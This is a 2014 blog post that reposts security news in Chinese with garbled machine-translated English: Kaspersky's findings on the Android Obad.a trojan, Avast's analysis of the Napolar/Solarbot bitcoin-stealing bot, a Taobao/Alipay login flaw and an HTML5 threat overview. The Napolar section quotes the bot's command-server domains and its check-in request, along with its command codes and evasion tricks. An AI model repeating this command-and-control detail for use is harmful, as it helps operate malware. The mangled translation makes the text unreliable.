28/01/2014 MCAFEE SECURE 認證的網站

https://www.mcafeesecure.com/RatingVerify?ref=www.HongKongCupid.com

2014年3月8日 星期六

''電腦/手机的資訊分享--1).由-卡巴斯基發現* --''首個利用殭屍網絡-->傳播的手機木馬"!!和 --2).在網絡中的新型木馬'比特幣'的貪婪惡行-->化身病毒插件運行'' --Win32/64-Napolar(正在熱烈發生中...)= 請小心防範此兇惡之''比特幣''-- --潜藏於任何陌生性的病毒插件..詳見內文..."!!-USA(en)-'' Computer / phone information sharing - 1) by the - Kaspersky found * - '' The first use of botnets - > phones spread Trojans " and ! ! - 2 ) new Trojan in the network ' bitcoin ' greedy evil - > incarnation virus plug- run '' --Win32/64-Napolar ( Being warm occurrence ... ) = Please be careful to prevent this evil of bitcoins '' '' - - Potential of the virus in any strange plugins .. See the text ..."!!

*''電腦/手机的資訊分享--1).由-卡巴斯基發現* --''首個利用殭屍網絡-->   
傳播的手機木馬"!!和   
--2).在網絡中的新型木馬'比特幣'的貪婪惡行-->化身病毒插件運行''   
--Win32/64-Napolar(正在熱烈發生中...)=    
--請小心防範此兇惡之''比特幣''-- <>--潜藏於任何陌生性的病毒插件.  
..詳見內文...  "!!
-USA(en)-'' Computer / phone information sharing - 1) by the - Kaspersky found * - '' The first use of botnets - > phones spread Trojans "   
and ! ! - 2 ) new Trojan in the network ' bitcoin ' greedy evil - >    
incarnation virus plug- run '' --Win32/64-Napolar --
--( Being warm occurrence ... ) = Please be careful to prevent    
this evil of bitcoins '' -<>- Potential of the virus in any strange plugins .. ...See the text ..."!!   

*''電腦/手机的資訊分享--1).由-卡巴斯基發現*
--''首個利用殭屍網絡-->傳播的手機木馬"!!和
--2).在網絡中的新型木馬'比特幣'的貪婪惡行-->化身病毒插件運行''
--Win32/64-Napolar(正在熱烈發生中...)=
請小心防範此兇惡之''比特幣''--
--潜藏於任何陌生性的病毒插件..詳見內文...

據報導,在過去3個月中,
卡巴斯基實驗室的專家一直在---
--對一種被稱為Obad.a木馬的安卓惡意應用--
--的傳播手段進行調查。
調查顯示,該木馬幕後的網絡罪犯--
--使用了一種全新的感染手段對該--
--惡意軟件進行傳播。
這也是手機網絡犯罪歷史上,
首個利用其他網絡犯罪集團--
--掌控的殭屍網絡進行傳播的木馬程序。
目前,Obad在CIS(獨聯體)國家傳播最為廣泛,
其中83%的感染均發生在俄羅斯。
此外,烏克蘭、白俄羅斯、
烏茲別克斯坦和哈薩克斯坦等國家的--
--移動設備上同樣檢測到這一木馬。

調查顯示,
Obad的多種版本採用了一種有趣的傳播模式,
即利用Trojan----SMS.AndroidOS.Opfake.a進行傳播。
這種雙重感染手段一般--
--通過向用戶發送短信來進行。
短信會提示用戶下載一個最新收到的短信息。
如果受害者點擊了短信鏈接,
會自下載動一個包含Opfake的文件--
--到用戶智能手機和平板電腦。
而用戶啟動該惡意文件,
惡意程序就會安裝。
一旦其成功運行,
木馬會向被感染設備中的所有聯繫人發送短信。
如果接收到這些短信的用戶點擊其中的鏈接,
就會下載Obad.a木馬。
這是一種非常有效的傳播系統。
一家俄羅斯移動網絡供應商聲稱,
僅在5小時內,網絡內就出現超過--
--600條包含此類惡意鏈接的短信,
這表明其傳播規模非常可觀。
大多數情況下,
該惡意軟件會利用已經被感染的設備進行傳播。

除了利用手機殭屍網絡進行傳播外,
這種高度複雜的木馬還能夠--
--通過垃圾短信進行傳播。
這也是Obad.a木馬的主要傳播途徑。
通常,手機用戶會接收到一條提示用戶“欠費”的短信,
如果用戶點擊了其中的鏈接,
便會自動下載Obad.a到移動設備。
同樣地,只有用戶運行下載文件,
才會將木馬安裝到設備上。

與此同時,
一些假冒的應用商店同樣會--
--傳播Backdoor.AndroidOS.Obad.a。
這些在線應用商店會抄襲Google Play的頁面,
並將其中的合法應用鏈接替換為惡意應用鏈接。
當合法網站被黑客攻陷後,
用戶就會被重定向到惡意網站。
Obad.a僅針對移動用戶發起攻擊,
如果用戶使用家用計算機訪問惡意網站,
則什麼都不會發生。
但是如果使用移動操作系統的--
--智能手機和平板電腦訪問,
即會被重定向到假冒的惡意網站(
目前只有安卓用戶面臨感染風險)。

“3個月期間,我們共發現12種不同版本--
--的Backdoor.AndroidOS.Obad.a。
這些惡意程序全都具有相似的功能--
--以及較高水平的干擾代碼。
每個版本的惡意程序都會利用安卓操作系統的漏洞,
使得惡意軟件具備設備管理員權限,
使得清除非常困難。
發現上述情況後,
我們立即通知了Google公司。
Google已經在安卓4.3中修補了上述安全漏洞。
但是,現在只有少數最新的智能手機和--
--平板電腦運行這一版本的安卓系統,
運行較早版本安卓系統的設備仍然面臨風險。
同其他安卓木馬不同,
Obad.a使用大量未公佈的漏洞進行感染,
這一點與Windows惡意軟件非常相似,
'”卡巴斯基實驗室頂級反病毒專家Roman Unuchek解釋說--
--如需了解更多關於Obad.a的傳播手段詳情,
請訪問 securelist.com.

[近期,卡巴斯基安全軟件安卓版已經上市,
它可以同時保護安卓智能手機和平板電腦設備,
使用相關設備的網友不妨下載試用下。]

---------------------------------------------------------------------------------------------   *USA9en)-*According to reports, in the past three months,
Kaspersky Lab experts have been ---
- On what is called a Trojan Andrews Obad.a malicious applications -
- Means of communication for investigation.
Investigation revealed that cybercriminals behind the Trojan -
- Use a new means of infection for the -
- The spread of malicious software .
It is also a crime in the history of the mobile phone network ,
The first use of other network crime syndicates -
- Control the spread of botnet Trojans .
Currently , Obad in the CIS ( Commonwealth of Independent States ) countries the most widely spread ,
83 % of infections occurred in Russia.
In addition , Ukraine, Belarus,
Uzbekistan and Kazakhstan, and other countries -
- The mobile device detects that the same horse .

Survey shows
Using multiple versions Obad an interesting mode of transmission ,
Namely the use of Trojan ---- SMS.AndroidOS.Opfake.a spread.
This dual infection means general -
- By sending an SMS to the user to carry out.
SMS text message prompts the user to download the latest received.
If the victim clicks the message link ,
Will move from the download of a file containing Opfake -
- To users of smart phones and tablet PCs .
The user launches the malicious file ,
Malicious programs will be installed.
Once its successful operation ,
Trojan sends infected messages to all contacts in the device .
If you receive these messages a user clicks on a link ,
Trojan will download Obad.a .
This is a very efficient communication systems.
A Russian mobile network provider claims ,
Only within 5 hours , over a network to appear -
- 600 text messages containing such malicious links ,
This suggests that the scale of its spread is very impressive.
In most cases,
The malware has infected devices use spread .

In addition to using botnets to spread outside of the phone ,
This highly sophisticated Trojan also -
- Spread through spam messages .
This is also the main route of transmission Obad.a Trojans .
Typically, mobile phone users will receive a prompt the user to "delinquent ," the message ,
If the user clicks on a link ,
Obad.a will automatically download to your mobile device .
Likewise, only the user run the downloaded file ,
Trojan will be installed on the device .

At the same time ,
Some fake application store will also -
- Spread Backdoor.AndroidOS.Obad.a.
These online application store will be copied Google Play page
And replace one of the legitimate application links to a malicious application link.
When legitimate sites are hacked ,
The user will be redirected to a malicious Web site .
Obad.a attack only for mobile users,
If you use your home computer to visit a malicious Web site ,
Then nothing will happen .
But if you use a mobile operating system -
- Access to smart phones and tablet PCs ,
That will be redirected to the fake malicious website (
Currently only Android users face the risk of infection ) .

" Three -month period , we found a total of 12 different versions -
- The Backdoor.AndroidOS.Obad.a.
These malicious programs all have similar functionality -
- And high interference level code.
Each version of the malicious program will use the Android operating system vulnerabilities ,
Making equipment have administrator privileges malware ,
Makes clear very difficult.
Found that the above situation,
We immediately notified the Google company .
Google has Android 4.3 fixes these vulnerabilities .
But now, only a handful of the latest smartphones and -
- Tablet PC running this version of the Android system ,
Android devices running earlier versions of the system are still at risk.
Different with other Android Trojans ,
Obad.a use a lot of unpublished vulnerabilities infection,
This is very similar to the Windows Malicious Software ,
' " Kaspersky Lab 's top anti-virus expert Roman Unuchek explains -
- For more details about Obad.a means of communication ,
Please visit securelist.com.

[ Recently, the Android version of Kaspersky security software already on the market ,
It can protect both Android smartphones and tablet devices ,
The use of related equipment users may wish to download a trial under . ]

-------------------------------------------------- -------------------------------------------*在最近幾個星期裡的AVAST惡意樣本分析名單中,
Win32/64:Napolar擁有極高的文件和網絡屏蔽率。
另外,我們發現了被冠以Solarbot名稱的新型木馬--
--於2013年5月左右開始做出其相關宣傳廣告,
而這種廣告並沒有發佈在大家經常訪問的黑客論壇,
而是在由主流搜索引擎索引一個叫solarbot.net的網站,
它擁有一個非常專業的外觀設計.



*Analysis of samples of malicious AVAST list in recent weeks , the
Win32/64: Napolar has a high rate of file and network shield .
In addition, we found that the new name was called Solarbot Trojan -
- In about May 2013 began to make its related advertising,
And this kind of advertising , and we do not publish frequently visited hacker forums
But by the major search engines index a website called solarbot.net ,
It has a very professional design .*   

*對於Win32/64:Napolar木馬,
它的進程間通信管道名稱是\\.\pipe\napSolar。
再加上存在的類似“CHROME.DLL”、
“OPERA.DLL”、“trusteer”、
“data_inject”等字符串,
以及後面會提到的功能特徵,
因此我們確定它和Solarbot間存在某種關聯。
讓我們來看看下面的分析。

  Dropper

該文件最初以自解壓的壓縮文件形式存在,
--以類似Photo_021-WWW.FACEBOOK.COM.exe  --
--這樣的格式命名,
並執行2項工作:  
靜默執行dropper以及展示類似下面的辣妹照片
(譯者註:馬賽克是人類文明進步最大的絆腳石):*
*For Win32/64: Napolar Trojans,
Its inter -process communication pipe name is \ \. \ Pipe \ napSolar.
Coupled with the presence of similar "CHROME.DLL",
"OPERA.DLL", "trusteer",
"Data_inject" such as strings ,
And functional characteristics will be mentioned later ,
Therefore, we determine the existence of an association between it and Solarbot.
Let us look at the following analysis .

Dropper

This document was originally self-extracting compressed file exists ,
- In a similar Photo_021-WWW.FACEBOOK.COM.exe -
- This format is named ,
And perform two tasks:
Silent perform and display similar to the following dropper babes photos
( Translator's Note : Mosaic is the biggest stumbling block to the progress of human civilization ) :      
**作者*的聲明中宣稱''Solarbot--
--由Free Pascal的Lazarus IDE所編寫,
但我們想不出任何專業或者--
--商業性質的木馬有此類似特點。
從另一個角度來講,
我們不能確定該代碼是否用Free Pascal編寫的,
因為它PE頭部的許多信息--
--都不同於一般的用Free Pascal編譯的二進製文件。  
*核心可執行文件的結構如下:    


** Author * statement claiming '' Solarbot -
- Written by the Free Pascal 's Lazarus IDE,
But we can not think of any professional or -
- Commercial nature of this Trojan have similar characteristics .
From another perspective,
We can not determine whether the code is written using Free Pascal ,
Because many of its PE header information -
- Are different from the general use Free Pascal compiler binaries.

Structural core executable file is as follows :   
*x86初始的部分,
同時也用於識別系統的體系結構。
而在64位系統中,
還有一個通信模塊被解壓和加載。
LDE64(長度反彙編引擎)是一個32位--
--基於BeaEngine下的官方工具,
它能夠進行32位和64位架構指令解碼。
對於系統函數的修改來說--
--反彙編工作必不可少.
(確保成功的掛鉤一個定制的或模擬的源代碼塊)。

如網站廣告中提到的,
KERNEL32.DLL、NTDLL.DLL、
WININET.DLL、SHLWAPI.DLL、
PASPI.DLL中的所有重要函數都--
--進行了CRC32哈希處理.
(CRC32哈希常數表結構地址在0xFF395A)--
--並將其儲存在''虛擬''表單中。
與IsDebuggerPresent、
OutputDebugString函數相關的--
--反調試技巧也在此有所體現。
安裝到%AppData\lsass.exe後,
在新申請的內存空間0xFE0000處開始運行,
之後bot會自行關閉,
這意味著它不會在進程列表中被發現。

為了了解被這種木馬感染的地區分佈情況,
我們分析了相關檢測部分的運行狀況。
結果表明,每天至少有幾百台計算機被感染,
而這個數字相對於全部Solarbot樣本​​來講數量略多。
受到感染影響最嚴重的區域為中南美的哥倫比亞、
委內瑞拉、秘魯、墨西哥、
阿根廷以及亞洲的菲利賓、
越南和歐洲的波蘭。  
x86 initial portion ,
Also used to identify the architecture of the system .
In 64-bit systems ,
There is also a communication module is unpacked and loaded.
LDE64 ( length disassembly engine ) is a 32 -
- Based on official tool BeaEngine under
It is capable of 32-bit and 64-bit architectures instruction decoding.
To modify the system function is concerned -
- Disassembly work is essential .
( Ensure the success of a custom hook or simulated source code blocks ) .

As mentioned in the website advertising ,
KERNEL32.DLL, NTDLL.DLL,
WININET.DLL, SHLWAPI.DLL,
PASPI.DLL all important functions -
- Were CRC32 hashing .
(CRC32 hash table structure constant address 0xFF395A) -
- And store it in the '' virtual '' form.
And IsDebuggerPresent,
OutputDebugString function related -
- Anti- debugging techniques are also reflected here .
After installing the % AppData \ lsass.exe,
Start running a new application memory space 0xFE0000 Department
After the bot will turn itself off ,
This means that it will not be found in the process list .

In order to understand by this Trojan infection geographical distribution ,
We analyzed the correlation detection part of the operating conditions .
The results show that there are at least hundreds of daily computer is infected,
And this figure is concerned relative to the total number of samples Solarbot slightly more .
Regions most affected by the infection of Central America , Colombia ,
Venezuela, Peru , Mexico,
Argentina, as well as in Asia and Philippines ,
Vietnam and Poland in Europe .*    

*x86 initial portion ,
Also used to identify the architecture of the system .
In 64-bit systems ,
There is also a communication module is unpacked and loaded.
LDE64 ( length disassembly engine ) is a 32 -
- Based on official tool BeaEngine under
It is capable of 32-bit and 64-bit architectures instruction decoding.
To modify the system function is concerned -
- Disassembly work is essential .
( Ensure the success of a custom hook or simulated source code blocks ) .

As mentioned in the website advertising ,
KERNEL32.DLL, NTDLL.DLL,
WININET.DLL, SHLWAPI.DLL,
PASPI.DLL all important functions -
- Were CRC32 hashing .
(CRC32 hash table structure constant address 0xFF395A) -
- And store it in the '' virtual '' form.
And IsDebuggerPresent,
OutputDebugString function related -
- Anti- debugging techniques are also reflected here .
After installing the % AppData \ lsass.exe,
Start running a new application memory space 0xFE0000 Department
After the bot will turn itself off ,
This means that it will not be found in the process list .

In order to understand by this Trojan infection geographical distribution ,
We analyzed the correlation detection part of the operating conditions .
The results show that there are at least hundreds of daily computer is infected,
And this figure is concerned relative to the total number of samples Solarbot slightly more .
Regions most affected by the infection of Central America , Colombia ,
Venezuela, Peru , Mexico,
Argentina, as well as in Asia and Philippines ,
Vietnam and Poland in Europe .*     

*通信協議--
目前發現的C&C服務器有:
xyz25.com、cmeef.info、paloshke.org。
而後者註冊於臭名昭著的Bizcn.com公司。
我們曾在博客中提到的一款虛假修復工具=
=即註冊在這家具有欺詐性質的中國註冊商下。
廣告站solarbot.net的註冊信息如下:

Domain Name: SOLARBOT.NET

Registrar: NETEARTH ONE INC. D/B/A NETEARTH

Whois Server: whois.advancedregistrar.com

Referral URL: http://www.advancedregistrar.com

Name Server: NS1.BITCOIN-DNS.COM

Name Server: NS2.BITCOIN-DNS.COM

Status: clientTransferProhibited

Updated Date: 01-aug-2013

Creation Date: 01-aug-2013

Expiration Date: 01-aug-2014

註冊數據中聯繫信息被隱藏在PRIVACYPROTECT.ORG後面,
它吸引了眾多的涉及惡意活動的團體。

獲取執行命令的HTTP POST請求如下所示:

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: www.paloshke.org

Content-Length: 81

Pragma: no-cache

v=1.0&u=USER_NAME&c=COMP_NAME&s={7C79CE12-E753-D05E-0DE6-DFBF7B79CE12}&w=2.5.1&b=32

其中s字符表示一個從受害人環境獲取的,
隨之生成的RC4解密密匙,v代表bot的版本,
數字1.0表示這個bot的初始開發階段。

在成功的請求了之後,會得到響應。
就像我們所提到的那樣,
它是由RC4進行加密的,
通過POST查詢字段發送未加密的正確密鑰。
響應結構採用以0分割的字符串數組的形式。
每個字符串開頭使用一個字節來表示指令號碼.
(已觀察到15個不同的指令),
--->再加上相應的字符串:
在連接延遲(指令0xC).
中是秒數(一般為3600);
對於下載命令(指令0×12),
是文件的URL地址、
控制哈希以及一個解密密鑰; 
0×2指令安裝額外的文件WalletSteal.bin,
一個''比特幣錢包''的偷竊插件。
根據bitcoin.org,''比特幣錢包''相當於--->
--->''比特幣''網絡中的實體錢包,
它包含有允許用戶在''比特幣''交易中使用的密鑰。
實際上,這便是之前說的關於插件支持的例子!!@
插件加密放在%AppData中的臨時目錄SlrPlugin中。

特點--
以下特點列表就是在網站上所展示的:   
*Communication Protocol -

Currently found in C & C servers are:
xyz25.com, cmeef.info, paloshke.org.
The latter company registered in the infamous Bizcn.com .
We have mentioned in a blog a false repair tool =
= That is registered in the fraudulent nature of this club registered under the Chinese .
Registration Information Advertising station solarbot.net follows :

Domain Name: SOLARBOT.NET

Registrar:. NETEARTH ONE INC D / B / A NETEARTH

Whois Server: whois.advancedregistrar.com

Referral URL: http://www.advancedregistrar.com

Name Server: NS1.BITCOIN-DNS.COM

Name Server: NS2.BITCOIN-DNS.COM

Status: clientTransferProhibited

Updated Date: 01-aug-2013

Creation Date: 01-aug-2013

Expiration Date: 01-aug-2014

Registration data contact information is hidden behind PRIVACYPROTECT.ORG,
It attracts a large number of organizations involved in malicious activities.

Get HTTP POST request to execute the command as follows:

POST / HTTP/1.1

Content-Type: application / x-www-form-urlencoded

User-Agent: Mozilla/4.0 (.... Compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; NET CLR 1.1.4322; NET CLR 2.0.50727; NET CLR 3.0.4506.2152; NET CLR 3.5.30729)

Host: www.paloshke.org

Content-Length: 81

Pragma: no-cache

v = 1.0 & u = USER_NAME & c = COMP_NAME & s = {7C79CE12-E753-D05E-0DE6-DFBF7B79CE12} & w = 2.5.1 & b = 32

Where s represents a character taken from the victim environment ,
Subsequently generated RC4 decryption key , v behalf bot version
Figure 1.0 represents the initial development phase of this bot .

After a successful request , and will get a response .
As we have mentioned,
It is RC4 encryption ,
Send unencrypted correct key by POST query field .
Response of the structure in the form of zero- delimited string array.
The beginning of each string using a byte to represent instruction number 
( Has been observed 15 different instructions ) ,
--- > Together with the corresponding string :
In connection delay ( instruction 0xC).
Is the number of seconds ( typically 3600 ) ;
For the download command ( command 0 × 12),
Is the URL address of the file ,
Control hash and a decryption key ;
0 × 2 command to install additional files WalletSteal.bin,
A Bitcoin wallet '' '' theft plugins.
According bitcoin.org,'' '' bitcoin wallet equivalent --- >
--- >'' '' Bitcoin wallet network entities ,
It contains allows users to use '' in '' Bitcoin transaction key.
In fact , this is the case before you say about the plug-in support ! ! @
Plug-in encryption in % AppData in the temporary directory SlrPlugin .

Features -
The following is a list of features on the site are displayed :     



*
我們已看到FTP和POP3掠奪,

反向Socks5或者基礎功能模塊的實現。
有相關的字符串
(“SSL”、“http://”、“https://”、web瀏覽器庫的名字、 
“NSS layer”、“data_start”、“data_inject”、“data_end”)---
--反映了從瀏覽器發起攻擊的可能性。
確實,我們發現網絡銀行論壇的內容--
--以未加密的方法發送到--
--C&C服務器上,
但這僅在網站要求信譽或者--
--證書驗證時發生。
這可能和以下內置的URL列表有關:

https://urs.microsoft.com/urs.asmx

http://ocsp.verisign.com

http://ocsp.comodoca.com

http://safebrowsing.clients.google.com

http://dirpop.naver.com:8088/search.naver

而後通過內部指令0xF進行遠程更新。

接下來我們觀察到,
它下載了一個比特幣挖掘機,
並將其註入到系統臨時目錄的記事本文件中進行了執行.
(對應列表中的“MD5版本更新和系統下載”)。

最後,我們不得不說這個bot所展示的強悍的惡意能力,
再加上$200的合理價格,
近期很有可能大量湧現。
幸運的是,針對此的反病毒軟件將會應運而生,
使這些網絡犯罪種類更加的難以生存。

源代碼--
挑選的一些樣本的SHA256哈希值以及--
在AVAST引擎的覆蓋情況:    



*
We have seen FTP and POP3 plunder,

Reverse Socks5 or implement basic functional modules .
String related
("SSL", "http://", "https://", web browser library name,
"NSS layer", "data_start", "data_inject", "data_end") ---
- Reflects the possibility of attack from the browser .
Indeed, we found that the content of online banking forum -
- Sending an unencrypted way to -
- The C & C server ,
But this site requires only reputation or -
- Occurs when the certificate validation.
This may be , and the following list of built-in URL :

https://urs.microsoft.com/urs.asmx

http://ocsp.verisign.com

http://ocsp.comodoca.com

http://safebrowsing.clients.google.com

http://dirpop.naver.com:8088/search.naver

Then through the internal instruction 0xF remotely update.

Next we observed
It downloaded a bitcoin excavators,
And injected into the system temporary directory Notepad file 
 has been executed.
( Corresponding to the list of "MD5 version update and   
system download" ) .

Finally, we have to say that this bot malicious demonstrated  
 powerful capabilities,
Plus $ 200 for a reasonable price,
Recent likely in large numbers .
Fortunately, for this anti-virus software will come into being ,
Make more difficult to survive these types of cyber crime .

Source code -
Hash value selected some samples of SHA256 and -
AVAST engine in coverage :      


*''電腦/手机的資訊分享--1).由-卡巴斯基發現* --''首個利用殭屍網絡-->   



傳播的手機木馬"!!和   
--2).在網絡中的新型木馬'比特幣'的貪婪惡行-->化身病毒插件運行''   
--Win32/64-Napolar(正在熱烈發生中...)=    
--請小心防範此兇惡之''比特幣''-- <>--潜藏於任何陌生性的病毒插件.  
..詳見內文...  "!!
-USA(en)-'' Computer / phone information sharing - 1) by the - Kaspersky found * - '' The first use of botnets - > phones spread Trojans "   
and ! ! - 2 ) new Trojan in the network ' bitcoin ' greedy evil - >    
incarnation virus plug- run '' --Win32/64-Napolar --
--( Being warm occurrence ... ) = Please be careful to prevent    
this evil of bitcoins '' -<>- Potential of the virus in any strange plugins .. ...See the text ..."!!   
===Melody.Blog===THE   END===>/

2014年3月7日 星期五

*續--"上編28日的衛道''黑客者''精神--看看貪婪及邪惡的''比特幣''在哪個'支付宝'和'淘宝'將它成為一種交易貨幣後的结果!!!誰才是''黑客者''來擾亂市場上規模經濟的定案!?再來述[以往曾解柝過的]説HTML5的新一代-->被病毒不知不覺中侵入,--然後且看小型網站被病毒入侵現實狀...詳見內文...."-USA(en)-Continued - compiled on the 28th Wei Road'' by'' hacker spirit - look greedy and evil'' in which'' bitcoins 'Paypal' and 'Taobao' Will it be the result of a transaction currency after!! ! who is'' hacker'' to disrupt the market by the economies of scale come finalized state [solution Watchman had previously had] said HTML5 is the next generation -!?> invaded by the virus unknowingly, - then Let us look at the reality of small sites are viruses like ... see inside text .... "!!

**續--"上編28日的衛道''黑客者''精神--看看貪婪及邪惡的''比特幣''--
--在哪個'支付宝'和'淘宝'將它成為一種交易貨幣後的结果!!! 
?!誰才是''黑客者''來擾亂市場上規模經濟的定案!?--
-->再來述[以往曾解柝過的]説HTML5的新一代-->被病毒不知不覺中侵入,  
--然後且看小型網站被病毒入侵現實狀...詳見內文...."   
-USA(en)-Continued - compiled on the 28th Wei Road'' by'' hacker spirit -  
 look greedy and evil'' in which'' bitcoins 'Paypal' and 'Taobao'    
Will it be the result of a transaction currency after!!    
! who is'' hacker'' to disrupt the market by the economies of scale come finalized state [solution Watchman had previously had] said HTML5 is the next generation -!?> invaded by the virus unknowingly,   
- then Let us look at the reality of small sites are viruses like ....
. see inside text .... "!!*

*"淘宝和支付宝"-確認被--->
爆存漏洞 <---黑客可登任意账号操作"!!
2014-02-18 13:30 x0sec FreebuF
 (某不方便透露姓名的黑客者)
根據知名漏洞報告平台烏云網公佈的消息,
淘寶安全認證機制存在漏洞,
黑客可以簡單利用該漏洞登錄---
---他人淘寶/支付寶賬號進行操作——>任​​何人無需密碼,
只需通過搜索引擎、
便可直接獲取其他用戶的隱私
-(賬戶餘額、交易記錄、
收貨地址、姓名手機號碼等敏感信息),
目前不清楚是否影響餘額寶等業務。
[不貪婪.不壞心眼的人-->
便不會跟這個''比特幣"作交易=
=漠視擾亂真實貨幣兌換市場的規則,
也或許有什么樣的狡詐的人在進行''換洗黑暗金錢"么!!?
否則怎會對政府/全世界所否定的''比特幣"不成立,
而妄顧之卻高調地表示你們的接立使用,
這様是否稱作反行其正道??!
"因此,"正義之人"--現身,
給你們貪婪及邪惡的行為一個警告!!!
''正義與邪惡''徒然使現實中的人慾償之結果嘛?!!]   







*(en)*"Taobao and Alipay" - confirmed by ---> 
Critical vulnerabilities exist <--- hackers can board any account operation "!! 
2014-02-18 13:30 x0sec FreebuF 
 (A hacker to disclose the names of persons) 
According to well-known loophole reporting platform cloud network announced the news, 
Taobao loopholes security authentication mechanism, 
Hackers can easily exploit the vulnerability Login --- 
--- Others Taobao / Alipay account to operate -> anyone without a password, 
Simply by search engines, 
Can directly access to other users' privacy 
- (Account balances, transaction records, 
Shipping address, name, phone number and other sensitive information) 
It is unclear whether the impact on the balance of treasure and other services. 
[Not greedy people who do not splenetic -> 
This will not work with'' Bitcoin "transaction = 
= Ignore disrupt real currency exchange market rules 
Perhaps what kind of cunning people making money'' dark wash, "What!!? 
Otherwise, how could the government / the world are denied the'' Bitcoin "is not true, 
Erwang Gu said you was high-profile use of the access legislation, 
This is known as the anti-line specifications of its right way??! 
"Therefore," justice of the people "- coming out, 
Give you a greedy and evil act a warning!!! 
'''' Vain and evil so that the results of the reality of human desire subordinated Well?!!] *   
* 
*--同樣出自烏云網的另一個漏洞報導稱,
淘寶認證缺陷導致可登錄--
--任意淘寶賬戶及支付寶。
烏云網報導稱該漏洞類型為--
--“設計缺陷、邏輯錯誤”,
並將危害等級標為“高”。
目前,該漏洞還在等待廠商進行處理。‍‍[冷哼一聲]!!*   





























*(en)*-Another loophole same from cloud network reported that 
Taobao Certification defects can be registered - 
- Arbitrary Taobao and Alipay account. 
Clouds Network reported that the vulnerability type - 
- "Design flaws, logic errors" 
And hazard class labeled "high." 
Currently, the vulnerability still waiting for vendors for processing. [Lengheng soon] *  

 




























*有網友甚至已經利用該漏洞--

--登陸了幾個淘寶賬戶並截圖證明~   
*Some netizens have even exploited - 
- Landed a few shots Taobao account and prove ~    

*目目 前,淘寶和支付寶正在對此漏洞進行排查。
如果你發現支付寶賬戶金額丟失,
可通過撥打客服熱線95188轉1進行諮詢,
轉2進行賬戶凍結。
如果得到來自阿里巴巴的進一步反饋,
我們會及時對此事件進行更新報導。

更新:收到阿里巴巴的反饋稱,
經過排查,
確認這是近期一個新業務規則--
--引起的短時漏洞目前,
他們已經完成了修復,
並確認沒有用户因為此漏洞引發資金風險及損失.
*[還要強詞説没有用户損失.金錢=要想再被''黑客者''--
--時常光顧才懂哭出來的鬼喔!!]
*Currently, Taobao and Alipay investigation is being carried out this vulnerability. 
If you find that the amount of lost PayPal account, 
Available for consultation by calling a customer service hotline 95188 rpm, 
Turn 2 is the account frozen. 
If you get further feedback from Alibaba, 
We will promptly update this incident reports. 

Updated: Alibaba received feedback that 
After investigation, 
Confirmed that this is a recent new business rules - 
- Due to loopholes in the current short-term, 
They have completed the repair, 
And confirm that no user because this vulnerability caused liquidity  
risk and loss. 
* [Even stronger word that there is no loss of customers.'' Money = To no longer be frequented by hackers who can understand'' ghost cry out Oh!!] 
----------------------------------------------------------------------------------------

**再來談--'新一代HTML5-- 從新功能談網站安全''

[原文網址: 新一代HTML5 從新功能談網站安全評估,Information Security 資安人科技網 http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=6874#ixzz2vK2fhL00]
HTML5為HTML下一個主要的修訂版本,
為了能夠更容易在網頁裡針對多媒體、
圖片等內容作處理,它添加了許多語法特徵。
也增加一些新元素跟屬性,
以便於更易於被搜尋引擎的索引整理、
視障人士使用和方便小螢幕的裝置。 

仍應關注舊問題、新威脅--
HTML5的發展越來越成熟,
逐漸取代傳統的Flash互動方式,
如果可以充分運用HTML5,
具有種種好處,
包括如離線功能、即時通訊、
檔案以及硬體支援、
語意化、多媒體等。
舉例來說,使用Gmail的時候,
可以把檔案拖拉到網頁裡作為附件,
這便是部分的HTML5的應用了。

HTML 5是新一代的內容規範,
其涵蓋網頁(Web)、
行動平台與電子書,
預期將成為接下來幾年的內容規格主流。
與一般印象不同的是,
HTML5不僅僅有前一版HTML4的內容規格,
尚且新增許多新的功能,
包含內容面的繪圖、影音;
儲存面的Storage功能、
通訊面的Web Socket與--
--系統多工的Web Worker、
操作面上的拖拉(Drag and Drop)與--
--語音輸入功能等(如上圖),
可以說是有劃時代的改良,
集大成於一身,
對於系統建構規劃與實作人員而言--
--是個不可忽視的新趨勢,
但新科技總會帶來新的威脅,
這句話用於HTML5是再恰當不過了! 

我們大致上可以將HTML5中的安全威脅分為三大類--
1. 原有安全問題於HTML5中出現:
如最常見的跨站腳本攻擊(XSS)與--
--資料隱碼攻擊(SQL Injection)
依舊會在HTML5的時代中繼續出現。 

2. 因HTML5新功能所衍生之新問題:
以HTML5所提供的新功能來實作完成威脅手法。
例如,以LocalStorage存放XSS攻擊程式--
--與shell code、HTML5為基礎的--
--殭屍網路(Botnet)
-- 透過Web socket API功能--
--達成C&C(Command & Control)--
--以及資料傳輸等;
利用HTML5 達到內部網路掃描,
一般而言,駭客要進入到內部網路--
--除了透過郵件攻擊方式外,
多半需要耗費不少功夫,
而透過HTML5就可以透過--
--使用者瀏覽網頁時就發動對內部網路的掃描。
此外,HTML5還可以在用戶授權下--
--取得GPS位置資料,
用戶隱私更容易暴露風險之中。 

3. 因新平台所衍生之新問題:
因為HTML5同時為許多新平台、
新瀏覽器(browser)的內容規格,
因此許多原先的平台與瀏覽器--
--便需要更新其版本與功能。
新平台的推出表示有更多的機會產生弱點,
尤其是要處理HTML5這樣功能豐富、
內容變異性高的內容規格,
可以預期在新平台與--
--新瀏覽器將有新一代的安全問題產生 .*  










** Then talk about - 'a new generation of HTML5 - new features to talk about site security'' 

Original URL: HTML5 new features to talk about a new generation of site security assessment, Information Security Technology Net capital Dorians http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=6874 # ixzz2vK2fhL00 
HTML5 is the next major revision of HTML one, 
To be able to more easily for multimedia on the page, the 
Images and other content for treatment, it adds a lot of grammatical features. 
Also add some new elements with attributes 
In order to be indexed in the search engines sorting easier, 
Easy to use and visually impaired small screen devices. 

Should still be concerned about old problems, new threats - 
HTML5 is becoming more and more mature, 
Gradually replacing the traditional interactive Flash, 
If you can make full use of HTML5, 
Has many benefits, 
Including features such as offline, instant messaging, 
Files and hardware support, 
Semantic, multimedia and so on. 
For example, when using Gmail, 
You can drag and drop the file as an attachment to a page where, 
This application is part of the HTML5. 

HTML 5 is the next generation of content specification, 
It covers Web (Web), 
Mobile platform and e-books, 
Expected to become mainstream in the next few years the content specifications. 
And the general impression is different, 
